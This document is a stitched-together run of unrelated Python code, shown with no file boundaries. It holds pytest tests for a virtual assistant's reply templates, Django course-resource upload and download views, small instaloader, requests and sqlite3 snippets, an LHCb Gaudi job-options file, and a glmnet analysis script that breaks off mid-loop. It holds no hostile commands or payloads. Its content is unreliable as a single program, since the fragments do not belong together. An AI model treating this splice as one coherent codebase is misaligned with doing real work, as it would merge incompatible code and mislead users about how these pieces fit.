    assert virt.reply("news about cats") == news_about
    assert virt.reply("news for cat meat") == news_about


def test_news():
    """Bare 'news' opens the Google News front page."""
    news = (["Will do, NN","opening Google News...","Here's the news"],"${webbrowser.open('https://news.google.com/news/')}")
    assert virt.reply("news") == news


def test_lookup_amazon():
    """'<term> on amazon' routes to getSearchAmazon(group 2)."""
    lookup_amazon = ["${self.toolBox.getSearchAmazon(self.match.group(2))}"]
    assert virt.reply("look up cats on amazon") == lookup_amazon
    assert virt.reply("search cats on amazon") == lookup_amazon


def test_amazon_for():
    """'amazon <term>' routes to getSearchAmazon(group 1)."""
    amazon_for = ["${self.toolBox.getSearchAmazon(self.match.group(1))}"]
    assert virt.reply("amazon for cats") == amazon_for
    assert virt.reply("amazon cats") == amazon_for


def test_search_amazon():
    """Bare amazon prompts route to getSearchAmazon()."""
    search_amazon = ["${self.toolBox.getSearchAmazon()}"]
    assert virt.reply("search amazon") == search_amazon
    assert virt.reply("shop amazon") == search_amazon


def test_google_images():
    """Picture searches open a Google Images query."""
    google_images = ["${webbrowser.open('https://www.google.com/search?q=%s&tbm=isch' % self.match.group(1))}"]
    assert virt.reply("find pictures of cats") == google_images
    assert virt.reply("search the web for cat photos") == google_images


def test_google_videos():
    """Video searches open a Google Videos query."""
    google_videos = ["${webbrowser.open('https://www.google.com/search?q=%s&tbm=vid' % self.match.group(1))}"]
    assert virt.reply("find cat videos") == google_videos
    assert virt.reply("search for cat vids") == google_videos
def test_google_search():
    """Generic lookups route to toolBox.googleIt(arg)."""
    google_search = ["${self.toolBox.googleIt(self.match.group(1))}"]
    assert virt.reply("google cats") == google_search
    assert virt.reply("look up cats") == google_search


def test_search_web():
    """Bare web searches route to toolBox.googleIt()."""
    search_web = ["${self.toolBox.googleIt()}"]
    assert virt.reply("search the web") == search_web


def test_duck_it():
    """'duck <term>' routes to toolBox.duckIt(arg)."""
    duck_it = ["${self.toolBox.duckIt(self.match.group(1))}"]
    assert virt.reply("duck cat pictures") == duck_it


def test_duck():
    """Bare 'duck' routes to toolBox.duckIt()."""
    duck = ["${self.toolBox.duckIt()}"]
    assert virt.reply("duck") == duck


def test_define():
    """Definitions sanitize the term and route to getDefinition."""
    define = "${self.toolBox.getDefinition(re.sub(r'[\W]', ' ', self.match.group(1)))}"
    assert virt.reply("define cat") == define
    assert virt.reply("what's the definition of cat") == define


def test_example_of():
    """Usage examples route to toolBox.usedInASentence."""
    example_of = ("${self.toolBox.usedInASentence(re.sub(r'[\W]', ' ', self.match.group(1)))}")
    assert virt.reply("example of cat in a sentence") == example_of
    assert virt.reply("use cat in a sentence") == example_of


def test_synonym():
    """Synonym requests route to toolBox.getSynonyms(arg)."""
    synonym = ("${self.toolBox.getSynonyms(self.match.group(1))}")
    assert virt.reply("synonyms of cat") == synonym
    assert virt.reply("synonym for dog") == synonym


def test_translate_phrase():
    """Phrase translation passes phrase, target, and source languages."""
    translate_phrase = "${self.toolBox.translateTo(self.match.group(1),self.match.group(3),self.match.group(2))}"
    assert virt.reply("translate hello from english to spanish") == translate_phrase
    assert virt.reply("translate hola from spanish to english") == translate_phrase


def test_translate():
    """Language-pair translation passes only the two languages."""
    translate = "${self.toolBox.translateTo(self.match.group(1),self.match.group(2))}"
    assert virt.reply("translate english to spanish") == translate
    assert virt.reply("translate italian to english") == translate
def test_weather_outside():
    """General weather prompts route to weatherPrint()."""
    weather_outside = ["${self.toolBox.weatherPrint()}"]
    assert virt.reply("what's the weather like") == weather_outside
    assert virt.reply("how's it outside") == weather_outside
    assert virt.reply("what's it like outside") == weather_outside


def test_humidity():
    """Humidity prompts route to weatherPrint('Humidity')."""
    humidity = "${self.toolBox.weatherPrint('Humidity')}"
    assert virt.reply("what's the humidity") == humidity
    assert virt.reply("is it humid") == humidity
    assert virt.reply("is it humid today") == humidity


def test_temp():
    """Temperature prompts route to weatherPrint('Temp.')."""
    temp = "${self.toolBox.weatherPrint('Temp.')}"
    assert virt.reply("what's the temperature") == temp
    assert virt.reply("how cold out") == temp


def test_wind_pressure():
    """Pressure prompts route to weatherPrint('Pressure')."""
    wind_pressure = "${self.toolBox.weatherPrint('Pressure')}"
    assert virt.reply("what's the wind pressure") == wind_pressure
    assert virt.reply("do you know the atmospheric pressure") == wind_pressure


def test_wind():
    """Wind prompts route to weatherPrint('Wind')."""
    wind = "${self.toolBox.weatherPrint('Wind')}"
    assert virt.reply("wind") == wind
    assert virt.reply("how is the wind") == wind


def test_precipitation():
    """Precipitation prompts route to weatherPrint('Precip')."""
    precipitation = "${self.toolBox.weatherPrint('Precip')}"
    assert virt.reply("precipitation") == precipitation
    assert virt.reply("how's the precipitation") == precipitation


def test_dew_point():
    """Dew-point prompts route to weatherPrint('Dew Point')."""
    dew_point = "${self.toolBox.weatherPrint('Dew Point')}"
    assert virt.reply("dew point") == dew_point
    assert virt.reply("what's the measure of the dew point") == dew_point


def test_cloud_cover():
    """Cloud-cover prompts route to weatherPrint('Cloud Cover')."""
    cloud_cover = "${self.toolBox.weatherPrint('Cloud Cover')}"
    assert virt.reply("cloud cover") == cloud_cover
    assert virt.reply("what's the cloud cover") == cloud_cover
# --- time / date / email intents ---------------------------------------------
# Tuples mix choice-lists and fixed fragments; "NN" is presumably substituted
# with the user's name at runtime — verify against the response expander.
def test_current_time():
    current_time =(["It's ","the clock says "],"${time.asctime().split()[3]}",[" o'clock",""],", NN")
    assert virt.reply("time") == current_time
    assert virt.reply("what time is it") == current_time
    assert virt.reply("what's the current time") == current_time
def test_current_day():
    current_date = ("It's ","${' '.join(time.asctime().split()[:3])}",", NN")
    assert virt.reply("what's the date") == current_date
    assert virt.reply("what's today") == current_date
    assert virt.reply("what's the current date") == current_date
def test_current_year():
    current_year = (["It's ","The year is ","It's the year of "],"${time.asctime().split()[4]}",", NN")
    assert virt.reply("what's the current year") == current_year
    assert virt.reply("WhAT year is it") == current_year
def test_check_email():
    check_email = ("${self.toolBox.doCheckMail()}")
    assert virt.reply("check my email") == check_email
    assert virt.reply("show the gmail") == check_email
    assert virt.reply("display inbox") == check_email
def test_send_email_to():
    send_email_to = ["${self.toolBox.doSendMail(self.match.group(1))}"]
    assert virt.reply("send an email to example@example.com") == send_email_to
    assert virt.reply("email thomas@catnet.org") == send_email_to
def test_send_email():
    send_email = ["${self.toolBox.doSendMail()}"]
    assert virt.reply("send email") == send_email
    assert virt.reply("send an email") == send_email
# --- geolocation intents (toolBox.locationData keys mirror an IP-geo API) ----
def test_where_am_i():
    where_am_i = "${self.toolBox.whereAmI()}"
    assert virt.reply("where am i") == where_am_i
    assert virt.reply("what's my location") == where_am_i
def test_zipcode():
    zipcode = (["your zipcode is "],"${'{}'.format(*self.toolBox.locationData('zip_code'))}")
    assert virt.reply("what's my zipcode") == zipcode
    assert virt.reply("zipcode") == zipcode
def test_state():
    state = (["right now, ",""],["you're in "],"${self.toolBox.locationData('region_name')[0]}",[", NN",""])
    assert virt.reply("what state am i in") == state
    assert virt.reply("what's my state") == state
def test_city():
    city = (["right now, ",""],["you're in ","your city is "],"${self.toolBox.locationData('city')[0]}",[", NN",""])
    assert virt.reply("what city am i in") == city
    assert virt.reply("what's my city") == city
def test_country():
    country = (["right now, ",""],["you're in ","your country is ","you're standing in the country of "],"${self.toolBox.locationData('country_name')[0]}",[", NN",""])
    assert virt.reply("what country am i in") == country
    assert virt.reply("what's my country") == country
def test_timezone():
    timezone = (["right now, ",""],["you're in the "],"${self.toolBox.locationData('time_zone')[0]}"," timezone")
    assert virt.reply("what timezone am i in") == timezone
    assert virt.reply("what's my time zone") == timezone
def test_coordinates():
    coordinates = (["right now, ",""],["you're at latitude/longitude "],"${'{}, {}'.format(*self.toolBox.locationData('latitude','longitude'))}")
    assert virt.reply("what are my coordinates") == coordinates
    assert virt.reply("what's my latitude") == coordinates
    assert virt.reply("What's my longitude") == coordinates
# --- small-talk and tool-invoking intents ------------------------------------
def test_liar():
    liar = ["I would never tell a lie","Not me"]
    assert virt.reply("are you a liar") == liar
    assert virt.reply("do you lie") == liar
def test_guess_what():
    guess_what = ["what?","tell me!","did you win?"]
    assert virt.reply("guess what") == guess_what
def test_knock_knock():
    # NOTE(review): the leading " in c " fragment looks like template residue
    # carried over from main.py — confirm it is intentional there.
    knock_knock = [" in c stop right there, NN, I know it's you"]
    assert virt.reply("knock knock") == knock_knock
def test_chicken():
    chicken = ["How am I supposed to know? Ask the chicken","which chicken?","it just happened to","it probably just wanted to make a difference in the world","To truly know the chicken's motives, you must first understand the chicken itself"]
    assert virt.reply("why'd the chicken cross the road") == chicken
def test_where_are_you():
    where_are_you = ["I'm with you, NN", "Where do you think I am?"]
    assert virt.reply("where're you") == where_are_you
def test_shun_mode():
    shun_mode = "${self.toolBox.shunMode()}"
    assert virt.reply("please stop talking") == shun_mode
    assert virt.reply("shut up") == shun_mode
    assert virt.reply("go away") == shun_mode
def test_sing():
    sing = ["${self.toolBox.sing()}"]
    assert virt.reply("sing") == sing
def test_exit():
    # The local name shadows the `exit` builtin inside this test only.
    exit = "${exit()}"
    assert virt.reply("exit") == exit
    assert virt.reply("turn off") == exit
def test_do_you_like():
    do_you_like = ["I have never tried ${self.match.group(1)} before","I like whatever you like, NN","It depends, NN"]
    assert virt.reply("do you like cats") == do_you_like
    assert virt.reply("do you enjoy warrior cats") == do_you_like
def test_say():
    say = ["${self.match.group(1)}"]
    assert virt.reply("say cat") == say
    assert virt.reply("read book") == say
def test_copycat():
    copycat = ["${self.match.group(0)}"]
    assert virt.reply("copycat") == copycat
    assert virt.reply("stop copying me") == copycat
def test_prank():
    prank = (["Will do, NN","I would never","Don't give me any ideas"],["${webbrowser.open('https://www.youtube.com/watch?v=dQw4w9WgXcQ')}","${webbrowser.open('http://www.nyan.cat')}"])
    assert virt.reply("prank me") == prank
    assert virt.reply("please prank me") == prank
def test_kill_me():
    kill_me = ["Shall I hire an assassin?"]
    assert virt.reply("please kill me") == kill_me
def test_who_am_i():
    who_am_i = ["You're NN, NN","You are the one and only NN","I don't answer philosophical questions","${self.toolBox.personLookup(CONTACTS[0]['NN'])}"]
    assert virt.reply("who am i") == who_am_i
# --- sarcasm, compliments, lookups and greeting ------------------------------
def test_nice_job():
    nice_job = ["sarcasm killed the cat, NN", "Don't expect it"]
    assert virt.reply("nice job") == nice_job
    assert virt.reply("good job") == nice_job
def test_deny_sarcastic():
    deny_sarcastic = ["I totally believe you","Hmm...","Sure...","If you say so"]
    assert virt.reply("that wasn't sarcasm") == deny_sarcastic
    assert virt.reply("not being sarcastic") == deny_sarcastic
def test_question_sarcasm():
    question_sarcasm = ["Everything is sarcasm, NN","Sure...","Not at all","Definitely not","No way",
    "Sometimes I'm unintentionally sarcastic"]
    assert virt.reply('was that sarcasm') == question_sarcasm
def test_bad_job():
    bad_job = ["I gotta set the standards low, NN","You can count on it, NN","Sure!","If you had expected less you wouldn't have been disappointed"]
    assert virt.reply("bad job") == bad_job
def test_tell_joke():
    tell_joke = ["${self.toolBox.tellAJoke()}"]
    assert virt.reply("tell me a joke") == tell_joke
    assert virt.reply("make up a joke") == tell_joke
def test_insult_me():
    insult_me = ["${self.toolBox.insultMe()}"]
    assert virt.reply("insult me") == insult_me
def test_good_dog():
    good_dog = ["woof woof!","purr!","I am","Yes you are, yes you are!"]
    assert virt.reply("who's a good dog") == good_dog
    assert virt.reply("good dog") == good_dog
def test_good_cat():
    good_cat = ["woof woof!","purr!","I am","Yes you are, yes you are!","meeeOW!"]
    assert virt.reply("good cat") == good_cat
    assert virt.reply("who's a good kitty") == good_cat
def test_good_virt():
    good_virt = ["I am","Indeed I am","That's me","You know it!"]
    assert virt.reply("who's a good virtual assistant") == good_virt
    assert virt.reply("good virtual assistant") == good_virt
def test_who_is():
    who_is = ["${self.toolBox.personLookup(self.match.group(1))}"]
    assert virt.reply('who\'s Pablo?') == who_is
    assert virt.reply('who\'re you talking about') == who_is
def test_what_is_a():
    what_is_a = ["${self.toolBox.whatIsLookup(self.match.group(1))}"]
    assert virt.reply("what is a cat") == what_is_a
    assert virt.reply("what's a dog") == what_is_a
def test_hello():
    hello = (['hello','what up','howdy','hi','salutations','greetings',"hiya","hey"],", NN")
    assert virt.reply("hello") == hello
# --- short conversational patterns -------------------------------------------
def test_why_not():
    why_not = ["because I said not"]
    assert virt.reply("awwww why not") == why_not
    assert virt.reply("why not") == why_not
def test_why():
    why = ["because I said so"]
    assert virt.reply("why?") == why
    assert virt.reply("why") == why
def test_oh_really():
    oh_really = ["yes, really","nope"]
    assert virt.reply("oh really") == oh_really
    assert virt.reply("really") == oh_really
def test_dont_ask():
    dont_ask = ["don't ask what?","ask what, NN?"]
    assert virt.reply("don't ask") == dont_ask
def test_he_is():
    he_is = ["who's ${self.match.group(1)}?","how ${self.match.group(1)}","very ${self.match.group(1)}"]
    assert virt.reply("he's a dingbat") == he_is
    assert virt.reply("he's a moron") == he_is
def test_it_is():
    it_is = ["what's ${self.match.group(1)}?","very ${self.match.group(1)}","that's ${self.match.group(1)}"]
    assert virt.reply("it is stupid!") == it_is
    assert virt.reply("it is wacky") == it_is
def test_that_is():
    that_is = ["no way is that ${self.match.group(1)}","it was very ${self.match.group(1)}"]
    assert virt.reply("that's crazy") == that_is
    assert virt.reply("that's insance") == that_is
def test_are_you():
    are_you = ["I am ${self.match.group(1)}","I am not ${self.match.group(1)}"]
    assert virt.reply("are you a wizard") == are_you
    assert virt.reply("are you a felon?") == are_you
def test_what_do_you():
    what_do_you = (["you know what I ${self.match.group(1)}"],[", NN",""])
    assert virt.reply("what do you do") == what_do_you
    assert virt.reply("what do you eat with your salad") == what_do_you
def test_who_do_you():
    who_do_you = (["you should know who I ${self.match.group(1)}","I ${self.match.group(1)} everyone"],[", NN",""])
    assert virt.reply("who do you know the best") == who_do_you
    assert virt.reply("who do you trust") == who_do_you
def test_when_do_you():
    when_do_you = (["I ${self.match.group(1)} whenever I want","I ${self.match.group(1)} all day","I never ${self.match.group(1)}"],[", NN",""])
    assert virt.reply("when do you shop at walmart") == when_do_you
    assert virt.reply("when do you shower") == when_do_you
def test_where_do_you():
    where_do_you = (["I ${self.match.group(1)} all over the place","I ${self.match.group(1)} wherever you want"],[", NN",""])
    assert virt.reply("where do you shop") == where_do_you
    assert virt.reply("where do you dance") == where_do_you
def test_potty_words():
    potty_words = ["No fucking cursing"]
    assert virt.reply("fuck yourself") == potty_words
    assert virt.reply('damn it') == potty_words
def test_insults():
    insults = ["NN! Do not use that foul language in my presence","Insulting your only friend is unwise, NN"]
    assert virt.reply("meanie!") == insults
    assert virt.reply("idiot") == insults
def test_yes_you_are():
    yes_you_are = ["Yes I am!","Yes you are!","No I'm not"]
    assert virt.reply("yes, you are") == yes_you_are
    assert virt.reply("yes you are") == yes_you_are
def test_celebrate():
    celebrate = [r"self.celebrate()${self.match.group(1)}","yay${self.match.group(1)}"]
    assert virt.reply("yay!") == celebrate
    assert virt.reply("hooray") == celebrate
def test_crying():
    crying = ["WA WA WA","Have the onions got you?","Aww, is your lacrymal drainage system malfunctioning?"]
    assert virt.reply("waaaaaaaa") == crying
def test_ahh():
    """The scream is echoed back with the matched run of H's."""
    ahh = ["A${self.match.group(1)}h"]
    # Bug fix: the original statement had no `== ahh` comparison, so the
    # assert only checked that the reply was truthy and could never fail
    # on a wrong template.
    assert virt.reply("AHHHHHHHHHHHHHHHHHHHHHH") == ahh
# --- miscellaneous reactions and IP lookups ----------------------------------
def test_laughing():
    laughing = ["It's not funny, NN"]
    assert virt.reply("hahahahaha") == laughing
    assert virt.reply("funny") == laughing
def test_dude():
    dude = ['dude']
    assert virt.reply("dude") == dude
def test_nice():
    nice = ["very ${self.match.group(0)}","such ${self.match.group(0)}"]
    assert virt.reply("nice") == nice
    assert virt.reply("wow") == nice
def test_okay():
    okay = ["OK","okie dokie"]
    assert virt.reply("okay") == okay
    assert virt.reply("ok") == okay
def test_sorry():
    sorry = ["Don't be sorry, NN","You better be sorry!"]
    assert virt.reply("sorry") == sorry
def test_what():
    what = ["what?","huh?","${self.match.group(0)} indeed"]
    assert virt.reply("huh, what!") == what
    assert virt.reply("huh") == what
def test_what_ip():
    what_ip = ["${self.toolBox.getPublicIP()}"]
    assert virt.reply("what's my public ip") == what_ip
    assert virt.reply("what is my ip") == what_ip
def test_local_ip():
    local_ip = ["${self.toolBox.getLocalIP()}"]
    assert virt.reply("what's my local ip") == local_ip
    assert virt.reply("what's my private ip") == local_ip
import os
import logging
import mimetypes
from django.shortcuts import render,HttpResponse
from rest_framework.views import APIView
from django.views.decorators.csrf import csrf_exempt
from django.http import StreamingHttpResponse,FileResponse
from rest_framework.response import Response
from django.utils.http import urlquote
from login.login_token import resolve_token
from course.models import Course
from .models import Resource
from user.models import Teacher
from pathlib import Path
from django.utils._os import safe_join
from SharePlatform.settings import MEDIA_ROOT
# Create your views here.
def hello(request):
    """Smoke-test view: always answers with a fixed greeting."""
    greeting = 'Hello World!'
    return HttpResponse(greeting)
class FileUploadView(APIView):
    """Accept course-resource uploads from teachers and register them."""
    permission_classes = []
    # Base directory for all uploaded resource files.
    path = os.path.join(MEDIA_ROOT, 'files')
    logger = logging.getLogger('resource.views')

    def get(self, request):
        """Render the upload page."""
        return render(self.request, 'index.html')

    @resolve_token
    def post(self, request, args):
        """
        Upload one or more files for the course named by the `id` query param.
        :param request: multipart request carrying the `file` list
        :param args: token payload injected by @resolve_token (role, uid)
        :return: JSON status Response
        """
        # Students may not upload; resources belong to teachers.
        if args.get('role') == 'student':
            return Response({'code': 401, 'msg': 'you have no authority'}, status=200)
        files = request.FILES.getlist('file', None)  # uploaded file list
        if not files:
            return Response({'code': 400, 'msg': 'no files upload'}, status=200)
        course_id = request.query_params.get('id')
        file_owner = Teacher.objects.get(uid=args.get('uid'))
        course = Course.objects.get(id=course_id)
        # One folder per course, named after the course. Kept in a local:
        # the original `self.path = os.path.join(self.path, ...)` mutated the
        # instance and would accumulate segments on any reuse.
        target_dir = os.path.join(self.path, course.name)
        if not os.path.exists(target_dir):
            self.logger.info('folder is not exist')
            os.makedirs(target_dir)
        # Write each file to disk, then record its metadata.
        for file in files:
            self.logger.info('uploading %s (%.1f KB)', file.name, file.size / 1024)
            # `with` guarantees the handle is closed even if a chunk write
            # fails (the original leaked the handle on error).
            with open(os.path.join(target_dir, file.name), 'wb') as destination:
                for chunk in file.chunks():
                    destination.write(chunk)
            Resource.save_resource(file, course, file_owner)
        return Response({'code': 201, 'msg': 'upload success'}, status=201)

    @csrf_exempt  # CSRF disabled: clients authenticate via token instead
    def dispatch(self, request, *args, **kwargs):
        return super(FileUploadView, self).dispatch(request, *args, **kwargs)
class FileDownloadView(APIView):
    """Serve stored course resources, streamed (GET) or by path (POST)."""
    permission_classes = []
    # Base directory where resource files live.
    path = os.path.join(MEDIA_ROOT, 'files')
    logger = logging.getLogger('resource.views')

    def get(self, request, resource_id):
        """
        Direct download of a resource by primary key.
        :param request:
        :param resource_id: primary key of the Resource row
        :return: streaming attachment response, or 404 JSON if the file is gone
        """
        resource = Resource.objects.get(pk=resource_id)
        # Build the absolute path in a local instead of mutating self.path,
        # so a reused view instance cannot accumulate joined segments.
        file_path = os.path.join(self.path, resource.path)
        file_name = resource.name
        if not os.path.exists(file_path):
            return Response({'code': 404, 'msg': '资源找不到'}, status=404)
        self.logger.info('下载' + file_name)
        # NOTE(review): read-modify-write is racy under concurrent downloads;
        # an F('download_count') + 1 update would be atomic — confirm needed.
        resource.download_count = resource.download_count + 1
        resource.save()
        response = StreamingHttpResponse(file_iterator(file_path))
        response['Content-Type'] = 'application/octet-stream'  # raw byte stream
        # urlquote keeps non-ASCII (e.g. Chinese) filenames valid in the header.
        response['Content-Disposition'] = 'attachment;filename="%s"' % (urlquote(file_name))
        return response

    def post(self, request):
        """
        Download a file by client-supplied path and display name.
        :param request: body with `filePath` and `fileName` (demo defaults)
        :return: FileResponse attachment
        """
        file_path = request.data.get('filePath', '《算法图解》.pdf')
        file_name = request.data.get('fileName', '《算法图解》.pdf')
        if not file_path:
            return HttpResponse('no filePath')
        # safe_join rejects paths that escape self.path (directory traversal).
        ab_file_path = Path(safe_join(self.path, file_path))
        response = FileResponse(ab_file_path.open('rb'), content_type='application/pdf')
        response['Content-Disposition'] = 'attachment;filename="%s"' % (urlquote(file_name))
        return response
def preview(request):
    """
    Resource preview: serve the file with its guessed MIME type so the
    browser renders it inline instead of forcing a download.
    :param request:
    :return: FileResponse for GET; placeholder HttpResponse for POST
    """
    if request.method == 'POST':
        return HttpResponse('hello word')
    # Hard-coded demo location; parameterize before production use.
    path = 'E:\\receive\\resources'
    file_path = 'django简介.pptx'
    if not file_path:
        return HttpResponse('no filePath')
    # safe_join rejects paths that escape `path` (directory traversal).
    ab_file_path = Path(safe_join(path, file_path))
    # Guess the content type from the extension; fall back to a byte stream.
    # (The original also bound an unused `file_name` local — removed.)
    content_type, encoding = mimetypes.guess_type(str(ab_file_path))
    content_type = content_type or 'application/octet-stream'
    response = FileResponse(ab_file_path.open('rb'), content_type=content_type)
    return response
def file_iterator(file_path, chunk_size=512):
    """
    Lazily read a file from disk in fixed-size chunks.
    :param file_path: absolute path of the file to read
    :param chunk_size: bytes per chunk
    :return: generator yielding non-empty byte chunks
    """
    with open(file_path, 'rb') as handle:
        # iter() with a sentinel stops as soon as read() returns b'' (EOF).
        for chunk in iter(lambda: handle.read(chunk_size), b''):
            yield chunk
|
import instaloader

# Fetch only the profile picture (no posts) of the requested account.
profile_loader = instaloader.Instaloader()
target_account = input("Enter username")
profile_loader.download_profile(target_account, profile_pic=True)
import requests

# Bug fix: a bare host like "www.google.com" makes requests.get raise
# requests.exceptions.MissingSchema — the URL needs an explicit scheme.
x = requests.get("https://www.google.com")
print(x)  # e.g. <Response [200]>
import sqlite3  # standard-library SQLite driver

# Connect to (or create) the example database file.
conn = sqlite3.connect('example.db')
c = conn.cursor()
# IF NOT EXISTS makes the script re-runnable: the original bare CREATE TABLE
# raised OperationalError on every run after the first.
c.execute("CREATE TABLE IF NOT EXISTS stocks2 (date text, trans text, symbol text, qty real, price real)")
# Insert one demo record (real code should use ? placeholders for user data).
c.execute("INSERT INTO stocks2 VALUES ('2006-01-05','BUY', 'RHAT', 100, 35.14)")
# Commit the insert before reading so other connections can see it.
# (The original also SELECTed from `stocks`, whose CREATE was commented out,
# so the first query always crashed — that query is removed.)
conn.commit()
for row in c.execute('SELECT * FROM stocks2 ORDER BY price'):
    print(row)
# Close the database connection.
conn.close()
|
#-- GAUDI jobOptions generated on Mon Jul 6 15:28:35 2015
#-- Contains event types :
#-- 13104231 - 32 files - 522500 events - 105.29 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-124834
#-- StepId : 124834
#-- StepName : Reco14a for MC
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p7
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124620
#-- StepId : 124620
#-- StepName : Digi13 with G4 dE/dx
#-- ApplicationName : Boole
#-- ApplicationVersion : v26r3
#-- OptionFiles : $APPCONFIGOPTS/Boole/Default.py;$APPCONFIGOPTS/Boole/DataType-2012.py;$APPCONFIGOPTS/Boole/Boole-SiG4EnergyDeposit.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-124632
#-- StepId : 124632
#-- StepName : TCK-0x409f0045 Flagged for Sim08 2012
#-- ApplicationName : Moore
#-- ApplicationVersion : v14r8p1
#-- OptionFiles : $APPCONFIGOPTS/Moore/MooreSimProductionWithL0Emulation.py;$APPCONFIGOPTS/Conditions/TCK-0x409f0045.py;$APPCONFIGOPTS/Moore/DataType-2012.py;$APPCONFIGOPTS/L0/L0TCK-0x0045.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-125336
#-- StepId : 125336
#-- StepName : Sim08a - 2012 - MD - Pythia8
#-- ApplicationName : Gauss
#-- ApplicationVersion : v45r3
#-- OptionFiles : $APPCONFIGOPTS/Gauss/Sim08-Beam4000GeV-md100-2012-nu2.5.py;$DECFILESROOT/options/@{eventType}.py;$LBPYTHIA8ROOT/options/Pythia8.py;$APPCONFIGOPTS/Gauss/G4PL_FTFP_BERT_EmNoCuts.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : Sim08-20130503-1
#-- CONDDB : Sim08-20130503-1-vc-md100
#-- ExtraPackages : AppConfig.v3r171;DecFiles.v27r8
#-- Visible : Y
#-- Processing Pass Step-124630
#-- StepId : 124630
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(
    # The 32 ALLSTREAMS.DST files of production 00027733: sequence numbers
    # 1-33 with number 23 absent from the bookkeeping, hence the exclusion.
    ['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00027733/0000/'
     '00027733_{0:08d}_1.allstreams.dst'.format(index)
     for index in range(1, 34) if index != 23],
    clear=True)
|
from glmnet import LogitNet
import matplotlib as mpl
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from sample import sample_equal_proportion
# Set matplotlib settings
# NOTE(review): the backend must be selected before pyplot is imported,
# which is why pyplot is imported mid-file below. The bare get_backend()
# call discards its result — presumably a leftover probe.
mpl.get_backend()
mpl.use('TkAgg')
import matplotlib.pyplot as plt
plt.style.use('ggplot')
# Constants controlling the elastic-net runs and the resampling experiment.
EXCLUDE_AGE = False
TRAIN_SIZE = 0.667
MAX_ITER = 1e6
ALPHA = 1
N_LAMBDA = 200
N_FOLDS = 5
N_DIVISIONS = 1000
N_ITERATIONS = 10
CUT_POINT = 0 # use 0 for minimum, 1 for within 1 SE
SURVIVAL_RATE_CUTOFF = 0.05
SHOW = False
SAVE = True
# Load data
# Assumes a tab-delimited table with subject/DIAGNOSIS/Male columns —
# TODO confirm against ../data/cocaine_dependence.txt.
data = pd.read_table('../data/cocaine_dependence.txt')
# Drop subjects column
data = data.drop('subject', axis=1)
# Possibly exclude age
if EXCLUDE_AGE:
    data = data.drop('AGE', axis=1)
# Handle dependent variables
y = data['DIAGNOSIS'].values
data = data.drop('DIAGNOSIS', axis=1)
# Handle categorical variable
# Kept as a column vector so it can be concatenated with the scaled block.
male = np.array([data['Male'].values]).T
data = data.drop('Male', axis=1)
X_raw = data.values
# Handle numeric variables
stdsc = StandardScaler()
X_std = stdsc.fit_transform(X_raw)
# Combine categorical variables and continuous variables
# Binary 'Male' is deliberately left unscaled.
X = np.concatenate([male, X_std], axis=1)
##############################################################################
# Replicating figure 1 - Done!
##############################################################################
# Fit the full data set N_ITERATIONS times; a coefficient "survives" if it is
# non-zero in more than SURVIVAL_RATE_CUTOFF of the fits.
# Create temporary containers
coefs = []
# Loop over number of iterations
for i in tqdm(range(N_ITERATIONS)):
    # Fit LogisticNet with the training set
    lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, cut_point=CUT_POINT, max_iter=MAX_ITER)
    lr = lr.fit(X, y)
    # Extract and save coefficients
    coefs.append(list(lr.coef_[0]))
coefs = np.array(coefs)
# 1/0 indicator of a non-zero coefficient per iteration.
survived = 1 * (abs(coefs) > 0)
survival_rate = np.sum(survived, axis=0) / float(N_ITERATIONS)
mask = 1 * (survival_rate > SURVIVAL_RATE_CUTOFF)
# Zero out coefficients of predictors that did not survive.
coefs_updated = coefs * mask
variable_names = ['Male'] + list(data.columns)
# 95% percentile interval plus mean of the surviving coefficients.
coefs_q025 = np.percentile(coefs_updated, q=2.5, axis=0)
coefs_mean = np.mean(coefs_updated, axis=0)
coefs_q975 = np.percentile(coefs_updated, q=97.5, axis=0)
betas = pd.DataFrame({'mean': coefs_mean})
betas['lb'] = coefs_q025
betas['ub'] = coefs_q975
betas['survival'] = mask
betas['predictor'] = variable_names
betas['sig'] = betas['survival']
# Colour-coding columns consumed by the downstream plotting script.
betas['dotColor1'] = 1 * (betas['mean'] != 0)
betas['dotColor2'] = (1 * np.logical_and(betas['dotColor1'] > 0, betas['sig'] > 0)) + 1
betas['dotColor'] = betas['dotColor1'] * betas['dotColor2']
betas.to_csv('./betas.csv', index=False)
##############################################################################
# Replicating figure 2 - Done!
##############################################################################
# Split data
# Fixed seed: one train/test split, averaged scores over N_ITERATIONS fits.
mask = sample_equal_proportion(y, proportion=TRAIN_SIZE, random_state=43210)
y_train = y[mask]
y_test = y[np.logical_not(mask)]
X_train = X[mask, :]
X_test = X[np.logical_not(mask), :]
# Create temporary containers
all_y_train_scores = []
all_y_test_scores = []
# Loop over number of iterations
for i in tqdm(range(N_ITERATIONS)):
    # Fit LogisticNet with the training set
    lr = LogitNet(alpha=ALPHA, n_lambda=N_LAMBDA, standardize=False, n_folds=N_FOLDS, max_iter=MAX_ITER, random_state=i)
